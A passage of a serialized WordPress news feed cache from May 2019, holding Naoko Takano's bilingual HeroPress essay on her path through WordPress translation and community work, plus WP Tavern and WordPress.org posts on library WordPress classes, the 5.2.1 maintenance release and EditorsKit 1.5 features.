dot com bubble. When I moved back to the U.S. with my then-husband for him to go back to graduate school in Detroit, I couldn’t re-enter the field because of my lack of experience. I settled with a temp in-house translator/admin assistant position at an automotive company to financially support the household. You could say it was a practical choice. Or, to put it frankly, I just gave up and went with the demand for the clerical job with Japanese skill.</p>\n<p>The good thing that came out of it was that I had plenty of time after work. My ex-husband had to study all day, and my temp job was precisely 9-5. Every night, we rarely watched T.V. or went out but headed for our computers. I worked on my own website and sometimes friend’s site for a fee, using just HTML and a little bit of CSS. Back then, reading blogs written by web designers was the best way to follow up-to-date news and techniques of frontend development.</p>\n<p>Inspired by those blogs in both English and Japanese, I decided to start mine. I published my first post on a Movable Type blog in April 2003. I wrote almost every day for a few months. Then as I was getting frustrated with some aspects of Movable Type, I tried several blog engines including WordPress.</p>\n<p>With WordPress, the process of customizing blog design through edits to PHP files was straightforward and enjoyable, so I got addicted to working with WordPress right away. I almost had no experience beyond HTML and CSS before then, but I was surprised that I was able to create a dynamic site myself.</p>\n<a href="https://s20094.pcdn.co/wp-content/uploads/2020/05/naoko-blog-design.png"><img /></a>My blog design between 2003-2019\n<h3>Translating WordPress</h3>\n<p>In November 2003, I re-launched my blog using WordPress. In December, I learned that there was a person named Otsukare who made a Japanese version of WordPress. This fork of WordPress, called “WordPress ME (Multilingual Edition)”, had the first comprehensive WordPress resource site in Japanese, with documentation Wiki and phpBB forums. Through the forum, I started helping him with translating documentation from English to Japanese.</p>\n<p>WordPress stayed as a relatively minor blog tool/CMS in Japan for years, but that didn’t change the fact that it was a piece of software that I really enjoyed using. I kept <a href="http://wpdocs.osdn.jp/">translating Codex</a>, participated in <a href="https://naoko.blog/tag/theme-competition/">theme competitions</a>, and helping others on the forums. It was the first time for me to experience being part of an open source community and working together with people I’ve never met in person (and without being paid!).</p>\n<p>What kept me going was the feeling that I’m part of something bigger. I loved using WordPress, and it was exciting that I could help spread the word. WordPress community gave me a chance to work with people around the world — years before “remote work” was a universally recognized word. There were no free voice/video chat applications, no Slack, but the interpersonal connections have grown deeper because everyone in the community was centered around a tool to deliver your voices to others far from reach.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">WordPress Polyglots at <a href="https://twitter.com/hashtag/WCEU?src=hash&ref_src=twsrc%5Etfw">#WCEU</a> contributor day, translating to so many languages! Thank you for coming! <img src="https://s.w.org/images/core/emoji/11.2.0/72x72/2764.png" alt="❤" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/11.2.0/72x72/2728.png" alt="✨" class="wp-smiley" /> <a href="https://t.co/bGvnfTIBYI">pic.twitter.com/bGvnfTIBYI</a></p>\n<p>&mdash; WordCamp Europe (@WCEurope) <a href="https://twitter.com/WCEurope/status/747062414886182913?ref_src=twsrc%5Etfw">June 26, 2016</a></p></blockquote>\n<p></p>\n<p>&nbsp;</p>\n<h3>Organizing WordCamp Tokyo</h3>\n<p>In 2007, I went to WordCamp San Francisco and had a short conversation with Matt Mullenweg. I vaguely remember my question &#8211; something like “I love WordPress, and I want to help spread it more in Japan. What should I do?” But I still clearly remember his answer.</p>\n<blockquote><p>“You should do a WordCamp.”</p></blockquote>\n<p>Although it probably was just a casual suggestion since we happened to be at a WordCamp, that idea stayed with me. That short interaction was no doubt the initial trigger of our first WordCamp in Japan, a year later. I was living in the U.S., but that really didn’t matter. Japanese WordPress translators, developers, and users who knew each other through the forums and blogs all worked together to run <a href="https://ja.wordpress.org/2008/09/04/wordcamp-tokyo-2008/">WordCamp Tokyo 2008</a>.</p>\n<img />WordCamp Tokyo 2008. Photo credit: Odyssey\n<h3>Career and Leadership</h3>\n<p>My career also changed dramatically between 2006 and 2009.</p>\n<p>Because I gained general blog template customization skills through working with WordPress, freelance work started to come in. I also had the opportunity to write WordPress books in Japanese. Thanks to WordPress, I was able to learn and practice the idea of ​​Web Standards. My ability to write solid markups was valued, and I got my first full-time technical job as a frontend engineer at an ad agency in a suburb of Detroit.</p>\n<p>In April 2009, I started as a part-time Happiness Engineer (customer support for WordPress.com) at Automattic, then in 2010 offered a full-time position. Since then, my role had evolved into the field of localization, and I’m happy to tell you that my 10th anniversary is coming up soon.</p>\n<p>In the past few years, I’ve taken up some more global responsibilities within the WordPress community, such as one of the Global Mentors for the <a href="https://make.wordpress.org/polyglots/">Polyglots Team</a>, and lead organizer of <a href="https://wptranslationday.org/">WordPress Translation Day 4</a>. Most recently, I was selected as the global leader of the first WordCamp Asia (planned for 2020 in Bangkok, Thailand).</p>\n<h3>Growing and Giving Back</h3>\n<p>The WordPress community taught me so much.</p>\n<ul>\n<li>Keep making efforts in good faith and results will follow.</li>\n<li>It takes time to build trust.</li>\n<li>Everyone has the potential to grow.</li>\n<li>You can’t ignore diversity so might as well embrace it.</li>\n</ul>\n<p>Sometimes the process of gaining such new insights was painful, but I still feel I’m lucky to have been given challenges that made me grow.</p>\n<p>To give back, I want to continue helping communities outside of the English speaking world. I believe that’s the most powerful thing I can do to remove the barriers on the web and the vast world that it touches.</p>\n<a href="https://s20094.pcdn.co/wp-content/uploads/2020/05/wctd4-tokyo.jpg"><img /></a>Tokyo WordPress Meetup / WordPress Translation Day 4\n<p>&nbsp;</p>\n<h2 id="ja">WordPress を通して成長できたという話</h2>\n<p>高野直子</p>\n<p>&nbsp;</p>\n<p>WordPress のことを知ったのは、約16年前でした。</p>\n<p>その数カ月後には元持っていたブログを WordPress に切り替え、さらにまた数カ月後には現在も続いている WordPress への翻訳という形での貢献を始めることになりました。振り返ると、社会人になってからほとんどの年数を、WordPress とともに過ごしてきたわけです。</p>\n<p>私が現在東京で子育てをしながらグローバルかつ柔軟な環境で働くことができるのは、新しい世界を見せてくれ、機会を与えてくれた WordPress の存在のおかげです。</p>\n<p>今こうやって、「WordPress との関わりが自分と周りの『バリア』を破ったこと」というテーマで記事を書かせてもらうにあたって思いを巡らせてみると、本当にこのソフトウェアと出会わなければまったく違う人生を歩んでいただろうなと思います。多くの人たちにもめぐりあうことはなかっただろうし、仕事はもちろん、住んでもいる場所も違っていたかもしれない。</p>\n<p>そんな、私にとってとても大きな存在の WordPress が、迷える20代を過ごしていた自分をどんなふうに変えてくれたかのお話をしようと思います。</p>\n<h3>WordPress との出会い</h3>\n<p>私が WordPress を知ったのは、2003年の春か夏頃でした。その頃の私はというと、高校留学後にアメリカ中西部の地方大学でグラフィックデザインの学位を取ったものの、新卒で入った小さな会社がドットコムバブルで立ち行かなくなったり、当時の夫の大学院入学のためにアメリカに戻ってきても経験不足で Web 関係の仕事には就けなかったり。とは言え家計を支える立場を選んだわけで、一旦やりたかった仕事はあきらめて、日系自動車会社で派遣をやっていた日々でした。インハウス翻訳者兼事務補助職のような感じで、お給料と需要を優先して良く言えばがむしゃらにがんばっていたし、悪くいうと目の前のことでいっぱいいっぱいという状況。</p>\n<p>ただ、そのころ時間だけはたっぷりあったんです。夫は暇さえあれば勉強していたし、派遣の仕事もそんなに忙しいものではなかったので、定時に帰って夕食後はテレビを見たり出かけたりはせず、それぞれパソコンに向かっていました。</p>\n<p>趣味やフリーランスの制作者として細々と HTML 手打ちのサイトなんかも作っていたのですが、Web デザイナーが個人で発信する情報はその当時ブログを読むのが何より最新で、ワクワクするものでした。</p>\n<p>そこからいきなり WordPress をインストールしたわけではなくて、まずは一番簡単そうだった Blogger.com を触ってみて制限がちょっと多すぎると感じ、Movable Type をしばらく運用してあまり相性がよくないかもと感じた、というのが私のブログ作りのスタートでした。その後ぴったりなタイミングで b2 からフォークしたリリース版を出したばかりだった WordPress に出会いました。</p>\n<p>PHP のファイルを触りながら自分のブログを作っていく過程が本当に楽しくて、いつのまにか WordPress にハマっていました。そのころはシンプルな構成だったからというのはもちろんあるんですが、それまでほぼ HTML と CSS しか書いたことがなかった自分がいつのまにかそんなふうにいわゆる「動的」サイトを作れるようになっていくことに自分でも驚きました。</p>\n<h3>WordPress 翻訳を始める</h3>\n<p>2003年11月にブログエンジンの変更を完了したサイトを公開し、12月に日本語版の WordPress フォーク “WordPress ME (Multilingual Edition)” を公開しているサイトがあることを知りました。Otsukare さんというエンジニアが行なっていた日本語情報の発信や日本語フォーラムでの回答をお手伝いしているうち、1ユーザーからファンへ、そしてローカリゼーションという分野でのコントリビュートをするようになっていきました。</p>\n<p>それから何年も、WordPress は日本では比較的マイナーなブログツール/CMS ではあったんですが、自分の中では本当に大好きなソフトウェアで、地道に <a href="http://wpdocs.osdn.jp/">Codex</a> の翻訳をしたり、<a href="https://naoko.blog/tag/theme-competition/">テーマ作成コンテスト</a>に応募したり、フォーラムで回答したりしていました。オープンソースという世界も、会ったこともない人たちと(お金にならない!)作業を一緒にするのも初めてでしたが、WordPress を通して会う人たちは本当に様々で、固定観念を覆してくれた気がします。留学や在米で「世界」を分かった気になっていたけど、それよりも私にとって理解を深めてくれたのは、英語を使ってアクセスすることができるようになった、多様な価値観が存在するオンラインのコミュニティでした。</p>\n<p>自分がブログを書くことが好きで、そのツールの成長に少しでも関われるという喜びが、飽きずにオープンソース活動を続けられた理由だった気がします。まだ「リモートワーク」なんて言葉も、動画チャットツールや Slack さえもない時期からオンラインで世界中の人達とコラボレーションする文化を持つ WordPress でしたが、遠く離れた人に考えを届られるブログというツールが中心にあったからこそ、コミュニティは深みを持って成長してきたし、人と人のつながりが構築されていったのだと思います。</p>\n<h3>WordCamp Tokyo の運営</h3>\n<p>2007年、サンフランシスコで開かれた WordCamp に遠征し、マットに声をかけました。「WordPress が好きで、日本でももっと広めるために何かできないかなと思ってるけど、どうしたらいいかな?」そんな内容だったと思います。質問の記憶はおぼろげですが、彼の答えは今でも覚えています。</p>\n<blockquote><p>「WordCamp やったらいいよ!(You should do a WordCamp.)」</p></blockquote>\n<p>たまたま WordCamp にいたからの思いつきから出た言葉だったのかもしれませんが、そのときの一言が印象的で、約1年後に日本初の WordCamp を実行するきっかけになったのは間違いありません。私自身は日本に住んでいなかったにも関わらず <a href="https://ja.wordpress.org/2008/09/04/wordcamp-tokyo-2008/">WordCamp Tokyo 2008</a> が実行できたのは、単なる言い出しっぺの私に「いいね!」と言って一緒に運営をしてくれた他の翻訳者、開発者、日本語版ユーザーの方々とのつながりがあったからでした。</p>\n<h3>キャリアへの影響</h3>\n<p>2006年~2009年には、自分のキャリアも大きく変わりました。</p>\n<p>WordPress にハマることで身につけたブログテンプレート一般のカスタマイズ能力でフリーランスの仕事が入ってきたり、WordPress の本を日本語で書く機会もいただきました。Web 標準の考え方に触れて実践することができたのも WordPress のおかげで、「普通に、きちんとマークアップが書ける」スキルを評価されて、ずっと前から入社したかったデトロイト郊外の会社でフロントエンドエンジニアとしての経験を積むこともできました。その後、2009年にお声がけをいただき、Automattic でのカスタマーサポート職としてスタートして、2010年からフルタイムでこの会社の「社員」となり、現在はローカリゼーション関連のチームでプロジェクト管理を担当しています。もうすぐ勤務10年を迎えます。</p>\n<p>回り回って今は<a href="https://make.wordpress.org/polyglots/">翻訳チーム</a>のグローバルメンターや、<a href="https://wptranslationday.org/">WordPress Translation Day</a> 4のリードオーガナイザーを任せてもらったり、そして自分でも驚くことに第一回 WordCamp Asia(2020年、バンコクにて開催予定)のグローバルリードにも選んでいただきました。</p>\n<h3>学びとお返し</h3>\n<ul>\n<li>誠実に努力を積み重ねていくことが実を結ぶ。</li>\n<li>信頼を築くには時間がかかる。</li>\n<li>誰にでも大きく成長できる可能性がある。</li>\n<li>多様性は必然。容認してしまうしかない。</li>\n</ul>\n<p>こういうことは当たり前のようでいて、実感できないような環境も少なくないのではないでしょうか。WordPress コミュニティだって常にパーフェクトではもちろんないにしろ、この場所ではそんな「当たり前」が大事されている、と私はよく感じます。みんなが納得できる普遍的な正しさが、長期的な視点での深みのあるコミュニティの維持と成長に欠かせない要素だと理解している人が多いからなのかなと思っています。</p>\n<p>自信も経験も少なかった自分にたくさんのことを学ばせてくれた WordPress と、その周りにいる人たちへの恩返しも込めて、これからさらに英語圏以外のコミュニティも手助けしていければと思っています。そうすることで、Web と世界を少しでも良い場所にできると信じているし、関わる多くの人のバリアを取り除くきっかけとなるはずです。</p>\n<div class="rtsocial-container rtsocial-container-align-right rtsocial-horizontal"><div class="rtsocial-twitter-horizontal"><div class="rtsocial-twitter-horizontal-button"><a title="Tweet: Growing Through Translating WordPress" class="rtsocial-twitter-button" href="https://twitter.com/share?text=Growing%20Through%20Translating%20WordPress&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fgrowing-through-translating-wordpress%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-fb-horizontal fb-light"><div class="rtsocial-fb-horizontal-button"><a title="Like: Growing Through Translating WordPress" class="rtsocial-fb-button rtsocial-fb-like-light" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fgrowing-through-translating-wordpress%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-linkedin-horizontal"><div class="rtsocial-linkedin-horizontal-button"><a class="rtsocial-linkedin-button" href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fgrowing-through-translating-wordpress%2F&title=Growing+Through+Translating+WordPress" rel="nofollow" target="_blank" title="Share: Growing Through Translating WordPress"></a></div></div><div class="rtsocial-pinterest-horizontal"><div class="rtsocial-pinterest-horizontal-button"><a class="rtsocial-pinterest-button" href="https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/growing-through-translating-wordpress/&media=https://heropress.com/wp-content/uploads/2020/05/052219-min-150x150.jpg&description=Growing Through Translating WordPress" rel="nofollow" target="_blank" title="Pin: Growing Through Translating WordPress"></a></div></div><a rel="nofollow" class="perma-link" href="https://heropress.com/essays/growing-through-translating-wordpress/" title="Growing Through Translating WordPress"></a></div><p>The post <a rel="nofollow" href="https://heropress.com/essays/growing-through-translating-wordpress/">Growing Through Translating WordPress</a> appeared first on <a rel="nofollow" href="https://heropress.com">HeroPress</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 21 May 2019 23:00:35 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:12:"Naoko Takano";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:10;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:92:"WPTavern: Loveland Public Library to Host Free Beginners WordPress Class Online May 22, 2019";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89982";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:102:"https://wptavern.com/loveland-public-library-to-host-free-beginners-wordpress-class-online-may-22-2019";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3315:"<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/library.png?ssl=1"><img /></a>image credit: <a href="https://stocksnap.io/photo/6XANS2384I">Janko Ferlic</a></p>\n<p>Public libraries are one of the few remaining community centers where people freely pass on valuable skills to neighbors young and old. In addition to offering free access to books, computers, and the internet, libraries often host educational classes as a public service, with an emphasis on teaching fundamental skills for navigating the digital world. </p>\n<p>Many people who are on fixed incomes or living paycheck to paycheck cannot afford to have internet service at home. For them, the library is a gateway to online communication, job hunting, and learning new skills.</p>\n<p>Over the past five years, using WordPress has become one of those important skills, as the software is now used by 33% of the top 10 million websites, across nearly every major industry. </p>\n<p>Packed into a full schedule of toddler story time, book chats, and knitting groups, the public library in Loveland, Colorado, is hosting a free workshop called <a href="https://lovelandpubliclibrary.org/event/wordpress-websites-t2-19/" rel="noopener noreferrer" target="_blank">Getting Started with a WordPress Website</a> on May 22, 2019, from 9:00 AM – 10:30 AM MDT. Participants will learn the history and terminology of WordPress, along with the step-by-step basics of creating a website. Topics include posts vs pages, using media, installing a theme, and using plugins. </p>\n<p>Participants who cannot attend in person at the library can register online for a free ticket on <a href="https://www.facebook.com/events/353235661970837/" rel="noopener noreferrer" target="_blank">Facebook</a> or through <a href="https://www.eventbrite.com/e/wordpress-websites-t2-19-tickets-59360407577?aff=efbeventtix&fbclid=IwAR18MOc21IlInUmdK3JRXPdXDMT8FPMkE4kYw5ltMpTyNsR47kWSWE3CZQY" rel="noopener noreferrer" target="_blank">Eventbrite</a>. Those participating remotely will need to install the Adobe Connect meeting browser plugin and will be able to listen to the lecture through the digital classroom and ask questions via chat.</p>\n<p>Another class will be hosted July 2, 2019, for those who are unable to attend the May workshop.</p>\n<p>Loveland Public Library is one of many libraries that host free WordPress classes. Skokie Public Library in Skokie, Illinois, will be hosting a <a href="https://skokielibrary.info/events/10377/build-a-website-with-wordpresscom" rel="noopener noreferrer" target="_blank">Build a Website with WordPress.com</a> workshop on Friday, May 24, and the Denver Public Library offers <a href="https://www.denverlibrary.org/ctc/wordpress-com-i" rel="noopener noreferrer" target="_blank">similar courses for WordPress.com</a> in various locations. The New York Public Library plans to offer a <a href="https://www.nypl.org/events/programs/2019/10/03/blogging-beginners" rel="noopener noreferrer" target="_blank">Blogging for Beginners</a> course at its Woodland Heights location on October 3, 2019. These are just a small sampling of the educational opportunities offered in this format. If you know someone who wants to get started with WordPress, local libraries are a good resource for finding a free, in-person class. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 21 May 2019 21:56:45 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:11;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:55:"WordPress.org blog: WordPress 5.2.1 Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6976";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:71:"https://wordpress.org/news/2019/05/wordpress-5-2-1-maintenance-release/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4909:"<p>WordPress 5.2.1 is now available! This maintenance release fixes 33 bugs, including improvements to the block editor, accessibility, internationalization, and the Site Health feature <a href="https://wordpress.org/news/2019/05/jaco/">introduced in 5.2</a>.</p>\n\n\n\n<p>You can browse the&nbsp;<a href="https://core.trac.wordpress.org/query?status=closed&resolution=fixed&milestone=5.2.1&order=priority">full list of changes on Trac</a>.</p>\n\n\n\n<p>WordPress 5.2.1 is a short-cycle maintenance release. <a href="https://core.trac.wordpress.org/query?milestone=5.2.2">Version 5.2.2</a> is expected to follow in approximately two weeks.</p>\n\n\n\n<p>You can&nbsp;download <a href="https://wordpress.org/download/">WordPress 5.2.1</a>&nbsp;or visit <strong>Dashboard → Updates</strong> and click&nbsp;<strong>Update Now</strong>. Sites that support automatic background updates have already started to update automatically.</p>\n\n\n\n<p>Jonathan Desrosiers and William Earnhardt co-led this release, with contributions from 52 other contributors. Thank you to everyone that made this release possible!</p>\n\n\n\n<p><a href="https://profiles.wordpress.org/xavortm/">Alex Dimitrov</a>, <a href="https://profiles.wordpress.org/tellyworth/">Alex Shiels</a>, <a href="https://profiles.wordpress.org/afercia/">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/aduth/">Andrew Duthie</a>, <a href="https://profiles.wordpress.org/azaozz/">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/rarst/">Andrey &#8220;Rarst&#8221; Savchenko</a>, <a href="https://profiles.wordpress.org/afragen/">Andy Fragen</a>, <a href="https://profiles.wordpress.org/anischarolia/">anischarolia</a>, <a href="https://profiles.wordpress.org/birgire/">Birgir Erlendsson (birgire)</a>, <a href="https://profiles.wordpress.org/chesio/">chesio</a>, <a href="https://profiles.wordpress.org/chetan200891/">Chetan Prajapati</a>, <a href="https://profiles.wordpress.org/daxelrod/">daxelrod</a>, <a href="https://profiles.wordpress.org/dkarfa/">Debabrata Karfa</a>, <a href="https://profiles.wordpress.org/odminstudios/">Dima</a>, <a href="https://profiles.wordpress.org/dd32/">Dion Hulse</a>, <a href="https://profiles.wordpress.org/ocean90/">Dominik Schilling</a>, <a href="https://profiles.wordpress.org/iseulde/">Ella van Durpe</a>, <a href="https://profiles.wordpress.org/edocev/">Emil Dotsev</a>, <a href="https://profiles.wordpress.org/sachyya-sachet/">ghoul</a>, <a href="https://profiles.wordpress.org/gziolo/">Grzegorz (Greg) Ziółkowski</a>, <a href="https://profiles.wordpress.org/gwwar/">gwwar</a>, <a href="https://profiles.wordpress.org/hareesh-pillai/">Hareesh</a>, <a href="https://profiles.wordpress.org/ianbelanger/">Ian Belanger</a>, <a href="https://profiles.wordpress.org/imath/">imath</a>, <a href="https://profiles.wordpress.org/audrasjb/">Jb Audras</a>, <a href="https://profiles.wordpress.org/jeremyfelt/">Jeremy Felt</a>, <a href="https://profiles.wordpress.org/joen/">Joen Asmussen</a>, <a href="https://profiles.wordpress.org/desrosj/">Jonathan Desrosiers</a>, <a href="https://profiles.wordpress.org/spacedmonkey/">Jonny Harris</a>, <a href="https://profiles.wordpress.org/chanthaboune/">Josepha</a>, <a href="https://profiles.wordpress.org/jrf/">jrf</a>, <a href="https://profiles.wordpress.org/kjellr/">kjellr</a>, <a href="https://profiles.wordpress.org/clorith/">Marius L. J.</a>, <a href="https://profiles.wordpress.org/mikengarrett/">MikeNGarrett</a>, <a href="https://profiles.wordpress.org/dimadin/">Milan Dinić</a>, <a href="https://profiles.wordpress.org/mukesh27/">Mukesh Panchal</a>, <a href="https://profiles.wordpress.org/onlanka/">onlanka</a>, <a href="https://profiles.wordpress.org/paragoninitiativeenterprises/">paragoninitiativeenterprises</a>, <a href="https://profiles.wordpress.org/parkcityj/">parkcityj</a>, <a href="https://profiles.wordpress.org/peterwilsoncc/">Peter Wilson</a>, <a href="https://profiles.wordpress.org/presskopp/">Presskopp</a>, <a href="https://profiles.wordpress.org/youknowriad/">Riad Benguella</a>, <a href="https://profiles.wordpress.org/sergeybiryukov/">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/netweb/">Stephen Edgar</a>, <a href="https://profiles.wordpress.org/sebastienserre/">Sébastien SERRE</a>, <a href="https://profiles.wordpress.org/tfrommen/">Thorsten Frommen</a>, <a href="https://profiles.wordpress.org/hedgefield/">Tim Hengeveld</a>, <a href="https://profiles.wordpress.org/timothyblynjacobs/">Timothy Jacobs</a>, <a href="https://profiles.wordpress.org/timph/">timph</a>, <a href="https://profiles.wordpress.org/tobiasbg/">TobiasBg</a>, <a href="https://profiles.wordpress.org/tonybogdanov/">tonybogdanov</a>, <a href="https://profiles.wordpress.org/tobifjellner/">Tor-Bjorn Fjellner</a>, <a href="https://profiles.wordpress.org/earnjam/">William Earnhardt</a>, and <a href="https://profiles.wordpress.org/fierevere/">Yui</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 21 May 2019 19:04:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:19:"Jonathan Desrosiers";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:12;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:101:"WPTavern: New in EditorsKit 1.5: Justify Text Alignment, Autosave On/Off Toggle, and Highlighted Text";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89826";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:109:"https://wptavern.com/new-in-editorskit-1-5-justify-text-alignment-autosave-on-off-toggle-and-highlighted-text";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5718:"<p>WordPress plugin developer <a href="https://jeffreycarandang.com" rel="noopener noreferrer" target="_blank">Jeffrey Carandang</a> continues to plough forward with new features for <a href="https://wordpress.org/plugins/block-options/" rel="noopener noreferrer" target="_blank">EditorsKit</a>, a collection of page building block options for Gutenberg. What began as a block visibility management plugin has grown to include more features aimed at tweaking various settings in the editor. </p>\n<p><a href="https://jeffreycarandang.com/editorskit-1-5/" rel="noopener noreferrer" target="_blank">Version 1.5</a> adds some text, heading, and paragraph styling and formatting options that aren&#8217;t currently available in core. For example, Gutenberg lets users change the background color and text color for an entire paragraph, but that&#8217;s where the color customizations end. EditorsKit now supports highlighting a section of text or a heading and choosing a color or background color.</p>\n<p></p>\n<p>This may seem like a niche request to implement but Carandang has <a href="https://github.com/phpbits/block-options/issues/9" rel="noopener noreferrer" target="_blank">tracked</a> nearly two dozen related issues and discussions where users are asking for text highlighting or similar features. </p>\n<p>This release also adds underline and justify alignment options to the paragraph block. Gutenberg doesn&#8217;t include it by default, as <a href="https://wptavern.com/wordpress-4-7-removes-the-underline-and-justify-buttons-from-the-editor" rel="noopener noreferrer" target="_blank">WordPress 4.7 removed the justify button from the TinyMCE editor</a> in 2016. However, the demand for justified text has not disappeared.</p>\n<p>In adding the format to EditorsKit, Carandang <a href="https://github.com/phpbits/block-options/issues/10#issuecomment-493672412" rel="noopener noreferrer" target="_blank">cited 10 issues</a> from Gutenberg&#8217;s GitHub repository and eight WordPress.org support topics where users have asked for the justify text option or have commented on it being missing. </p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/Gutenberg-justify-underline-formats.png?ssl=1"><img /></a></p>\n<p>Those who have Jetpack installed will already have the justify alignment option. Carandang plans to add a check for wpcom/justify to the next release so users of both plugins won&#8217;t have two justify options.</p>\n<p><a href="https://jeffreycarandang.com/editorskit-1-5/" rel="noopener noreferrer" target="_blank">EditorsKit 1.5</a> tackles the widespread issues with Gutenberg&#8217;s autosave function by adding a toggle that allows users to enable/disable it. This setting can be found under the vertical ellipses menu at the top of the editor.<br />\nUsers have <a href="https://github.com/WordPress/gutenberg/issues/9220" rel="noopener noreferrer" target="_blank">reported</a> getting stuck in autosave, particularly with slower connection speeds, and some have experienced problems with their hosts. </p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Neat. I’ve seen users leave their browser tab open all night and their session expires, but the autosaves continue to post even though it’s now getting a 403. Then when the person wakes up their server blacklisted their IP.</p>\n<p>&mdash; Jay (@wpdevlife) <a href="https://twitter.com/wpdevlife/status/1123209118246944768?ref_src=twsrc%5Etfw">April 30, 2019</a></p></blockquote>\n<p></p>\n<p>As the result of getting stuck in autosave, users often attempt to refresh the screen only to lose the work. This has been an ongoing problem since last year. EditorsKit gives users the option to turn autosave off if they are experiencing problems and save manually as they see fit.</p>\n<p>Version 1.5 adds theme support for changing the block width to match the page template and layout. This allows theme developers to customize block sizes based on the template the users selects.</p>\n<p>Carandang has been adding new features based on his own needs but has found most of them to be fairly common requests in the Gutenberg repository. He made upcoming features and ideas for EditorsKit <a href="https://github.com/phpbits/block-options/issues" rel="noopener noreferrer" target="_blank">public on GitHub</a> and is accepting feature suggestions in this format. A few of his current ideas under discussion include: </p>\n<ul>\n<li>a React emoji picker</li>\n<li>copy link icon for the top bar of the 